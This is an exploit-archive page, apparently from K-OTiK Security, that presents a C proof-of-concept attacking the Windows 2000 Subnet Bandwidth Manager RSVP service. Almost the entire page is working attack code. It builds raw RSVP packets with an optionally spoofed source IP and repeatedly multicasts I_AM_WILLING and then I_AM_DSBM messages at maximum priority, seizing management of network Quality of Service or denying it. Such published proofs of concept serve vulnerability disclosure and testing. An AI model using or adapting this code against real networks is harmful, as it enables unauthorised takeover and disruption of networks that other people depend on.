Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Exploit

    
 
     * Version TXT Disponible ici *
// Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking 
                              //
                              // A problem has been identified in the RSVP Server for Microsoft Windows 2000 that 
                              // may allow an attacker to hijack management of the network. This could allow an 
                              // attacker control of network Quality of Service.
                              // 
                              // By ste jones root at networkpenetration.com
                              //
                              // Proof of concept code for attack against RSVP / SBM (RFC 2814)
                              // compile: gcc rsvp.c -Wall -o RSVP_DoS
                              // Allows spoofing of source IP with -s
                              // Tested on linux against win2k server
                              // You will need to be root to launch the attack as we are using raw sockets

                              /* RSVP
                              * Resource ReserVation Protocol Munger
                              *
                              * multicast IP 224.0.0.17
                              * IP protocol number 0x2e for RSVP
                              *
                              * RSVP Header
                              * Version = 4bits
                              * flags = 4 bits
                              * message type = 8 bits = 67 = I_AM_DSBM
                              * RSVP checksum = 16 bits = set to 0's
                              * TTL = 8 bits = 1 on multicast
                              * Reserved = 8 bits
                              * RSVP length = 16 bits
                              * + data
                              *
                              * Data header
                              * Length = 16 bits
                              * Class = 8 bits
                              * type = 8 bits
                              * Obj contents
                              */

                              /*
                              *Proof of concept - doesnt check if RSVP priority of server assumes lower
                              */
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 

                              void usage(char *progname);
                              void startattack(void);
                              unsigned short in_chksum(unsigned short *pts, int nbytes);

                              struct rsvphead{
                              int flags:4;
                              int version:4;
                              char type:8;
                              int checksum:16;
                              char ttl:8;
                              char reserved:8;
                              int length:16;
                              };

                              struct rsvpdata{
                              char buf[40];
                              };


                              struct header{
                              struct iphdr ip;
                              struct rsvphead rhead;
                              struct rsvpdata rdata;
                              };

                              struct in_addr spoofed;

                              int main(int argc, char *argv[])
                              {

                              int c;
                              printf("RSVP Munger by Ste Jones from NetworkPenetration\n");
                              printf("----------------------------------------------------\n");
                              opterr = 0; //stop error messages from command line
                              while ((c=getopt(argc, argv, "s:")) != -1){
                              switch(c){
                              case 's':       if(!inet_aton(optarg, &spoofed)){
                                                printf("Malformed IP
                              address: %s\n",optarg);
                                                exit(1);
                                        }
                                        break;

                              default:        usage(argv[0]);
                                        exit(1);
                                        break;
                              }
                              }
                              for(;;){
                              startattack();
                              }
                              exit(0);
                              }

                              void startattack(void)
                              {
                              struct header heada;
                              struct sockaddr_in sin;
                              int sock;
                              int on;
                              int sinlen;
                              int willing;
                              unsigned char *sourceip;
                              on = 1;
                              willing = 4; //send willing four times then I_AM_DBSM
                              printf("\nSending %d I_AM_WILLING packets followed by I_AM_DSBM
                              packets every 5 seconds\n\n", willing);
                              for(;;){

                              memset(&heada, '\0', sizeof(heada));
                              if(willing) printf("Creating I_AM_WILLING packet\n");
                              else printf("Creating I_AM_DSBM packet\n");

                              heada.ip.ihl = 5;
                              heada.ip.version = 4;
                              heada.ip.tos = 0xc0; //same options as set by Microsoft
                              RSVP
                              if(willing) heada.ip.tot_len = htons(56);
                              else heada.ip.tot_len = htons(64);
                              heada.ip.id = 0x0000; //checksum calculate later
                              heada.ip.frag_off = 0;
                              heada.ip.ttl = 1; //multicast uses ttl of 1
                              heada.ip.protocol = 0x2e; //RSVP protocol number
                              heada.ip.check = 0;
                              if(spoofed.s_addr){
                              heada.ip.saddr = spoofed.s_addr;
                              }
                              else heada.ip.saddr = 0; //let kernel decide
                              heada.ip.daddr = inet_addr("224.0.0.17");

                              sourceip = (unsigned char *)&heada.ip.saddr;

                              heada.rhead.flags   = 0;
                              heada.rhead.version = 1;
                              if(willing) heada.rhead.type    = 0x42; //I_AM_WILLING
                              else heada.rhead.type    = 0x43; //I_AM_DSBM

                              heada.rhead.checksum= 0x0000; //checksum calculated later
                              heada.rhead.ttl     = 0x01;
                              heada.rhead.reserved= 0x00;
                              if(willing) heada.rhead.length = 0x2400;
                              else heada.rhead.length  = 0x2c00;

                              heada.rdata.buf[0]  = 0x00;//length
                              heada.rdata.buf[1]  = 0x08;//length
                              heada.rdata.buf[2]  = 0x2a;//0x2a01 = DSBM IP ADDR
                              heada.rdata.buf[3]  = 0x01;
                              heada.rdata.buf[4]  = sourceip[0];//IP address
                              heada.rdata.buf[5]  = sourceip[1];//if not spoofed DSBM IP
                              ADDR = 0
                              heada.rdata.buf[6]  = sourceip[2];//
                              heada.rdata.buf[7]  = sourceip[3];//

                              heada.rdata.buf[8]  = 0x00;//length
                              heada.rdata.buf[9]  = 0x0c;//length
                              heada.rdata.buf[10]  = 0xa1;//0a101 = RSVP_HOP_L2, IEEE
                              canonical addr
                              heada.rdata.buf[11]  = 0x01;
                              heada.rdata.buf[12]  = 0x00; //mac addr
                              heada.rdata.buf[13]  = 0x11; //
                              heada.rdata.buf[14]  = 0x22; //
                              heada.rdata.buf[15]  = 0x33; //
                              heada.rdata.buf[16]  = 0x44; //
                              heada.rdata.buf[17]  = 0x55; //
                              heada.rdata.buf[18]  = 0x00; //
                              heada.rdata.buf[19]  = 0x00; //

                              heada.rdata.buf[20]  = 0x00; //length
                              heada.rdata.buf[21]  = 0x08; //length
                              heada.rdata.buf[22]  = 0x2b; // 0x2b01 = SMB_Priority
                              heada.rdata.buf[23]  = 0x01; //
                              heada.rdata.buf[24]  = 0x00; //priority
                              heada.rdata.buf[25]  = 0x00; //priority
                              heada.rdata.buf[26]  = 0x00; //priority
                              if(!willing)heada.rdata.buf[27]  = 0xff; //priority 255
                              else heada.rdata.buf[27] = 0xff; //priority
                              //priority = 255
                              //highest possible priority
                              //if server has lower priority vulernable to DoS

                              if(!willing){
                              heada.rdata.buf[28]  = 0x00; //length
                              heada.rdata.buf[29]  = 0x08; //length
                              heada.rdata.buf[30]  = 0x2c; //0x2c01 = DSBM timer
                              intervals
                              heada.rdata.buf[31]  = 0x01;
                              heada.rdata.buf[32]  = 0x00; //retransmit time
                              heada.rdata.buf[33]  = 0x00; //
                              heada.rdata.buf[34]  = 0x0f; //0x0f?
                              heada.rdata.buf[35]  = 0x05; //time 5 seconds
                              }

                              heada.ip.check = in_chksum((unsigned short *)&heada.ip,
                              20);

                              sin.sin_family = AF_INET;
                              sin.sin_port = htons(0);
                              sin.sin_addr.s_addr = inet_addr("224.0.0.17");

                              if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
                              printf("Socket error %s\n",strerror(errno));
                              exit(1);
                              }

                              if((setsockopt(sock,IPPROTO_IP, IP_HDRINCL, &on, sizeof
                              (on))) < 0){
                              printf("Setsockopt error %s\n",strerror(errno));
                              exit(1);
                              }

                              sinlen = sizeof(sin);

                              if(willing){
                              if(sendto(sock, &heada, 56, 0, (struct sockaddr *)
                              &sin, sinlen) != 56){
                                printf("Sento error\n");
                                exit(1);
                              }
                              printf("Sent I_AM_WILLING packet\n");
                              }

                              else{
                              if(sendto(sock, &heada, 64, 0, (struct sockaddr *)
                              &sin, sinlen) != 64){
                                printf("Sento error\n");
                                exit(1);
                              }
                              printf("Sent I_AM_DBSM packet\n");
                              }

                              close(sock);
                              if(willing) willing--;
                              sleep(5);
                              }
                              }

                              void usage(char *progname)
                              {
                              printf("\n%s\n", progname);
                              printf("\t-s  Spoof source IP address\n");
                              printf("\n");

                              exit(1);
                              }

                              unsigned short in_chksum(unsigned short *pts, int nbytes)
                              {
                              register long sum;
                              u_short oddbyte;
                              register u_short answer;

                              sum = 0;
                              while(nbytes > 1){
                              sum += *pts++;
                              nbytes -=2;
                              }

                              if(nbytes == 1){
                              oddbyte = 0;
                              *((u_char *) &oddbyte) = *(u_char *)pts;
                              sum += oddbyte;
                              }

                              sum = (sum >> 16) + (sum &0xffff);
                              sum += (sum >>16);
                              answer = ~sum;
                              return(answer);
                              }
                              

 Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits